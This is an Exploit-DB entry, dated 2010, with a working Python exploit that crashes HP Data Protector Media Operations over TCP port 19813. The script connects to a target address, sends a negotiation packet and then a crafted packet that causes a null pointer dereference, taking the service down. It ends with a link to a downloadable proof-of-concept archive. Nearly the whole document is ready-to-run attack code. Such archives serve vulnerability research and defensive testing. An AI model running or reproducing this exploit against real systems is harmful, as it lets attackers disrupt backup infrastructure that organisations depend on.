HP Data Protector Media Operations - Null Pointer Dereference Remote Denial of Service

EDB-ID:

15214

CVE:



Author:

d0lc3

Type:

dos


Platform:

Windows_x86

Date:

2010-10-06


#!/usr/bin/python

import socket,struct,sys,os

SIGN=0x04030201
cmd=0x01000000

def main():
	if len(sys.argv)!=2:
		print"\n[x] Usage: python "+sys.argv[0]+" < ip_server >\n"
		sys.exit(0)
	
	else:
		host=sys.argv[1],19813	#default port TCP/19813

	if sys.platform=="win32":
	    os.system("cls")
	else:
	    os.system("clear")
	
	s=socket.socket()
	try:
		s.connect(host)
		s.recv(1024)
	except:
		print"[x] Error connecting to remote host! This is g00d :D."
		sys.exit(0)
	print"[+] Building crafted packets..."
	#packet negotiation request
	pktnego=struct.pack(">L",cmd+0x1)		#+0
	pktnego+=struct.pack("<L",0x00000000)		#+4
	pktnego+=struct.pack("<L",SIGN)			#+8 (signature)
	#packet crash
	pkt1=struct.pack("<L",cmd+0x2)
	pkt1+=struct.pack(">L",0x00000001)		# != 0x0
	pkt1+=struct.pack("<L",SIGN)
	#end	
	print"[+] Negotiation."
	s.send(pktnego)
	s.recv(1024)
	s.send(pkt1)#crash!
	s.close()

if __name__=="__main__":
	main()
#PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15214.zip